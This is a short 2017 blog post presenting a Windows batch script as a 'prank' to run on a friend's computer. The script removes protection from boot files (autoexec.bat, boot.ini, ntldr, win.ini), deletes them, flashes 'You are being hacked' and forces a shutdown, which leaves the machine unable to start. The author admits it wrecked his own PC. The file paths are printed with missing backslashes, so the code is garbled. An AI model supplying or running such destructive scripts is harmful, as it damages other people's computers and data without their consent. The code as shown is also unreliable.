SHUTDOWN PC AND DISABLE IT'S ABILITY TO RESTART.
- piyush shukla
- Dec 14, 2017
- 1 min read
Hey folks, wanna play a prank on your friend. Well recently i came across something on GitHub.
Open noteapd, and type/paste in the following lines of code:-
@echo off
attrib -r -s -h c:utoexec.bat
del c:utoexec.bat
attrib -r -s -h c:oot.ini
del c:oot.ini
attrib -r -s -h c: tldr
del c: tldr
attrib -r -s -h c:indowsin.ini
del c:indows.ini
@echo off
Msg *You are being hacked*
Shutdown -s -t 7 -c "Jaadu ho raha hai bro"
c:Drive
Save it as (King.bat) or whatever the hell you wanna name it, just make sure you have the extension as (.bat) and then run it.
NOTE :- It's damn dangerous, dont try it on your personal pc. I did and i fucked up big time.
コメント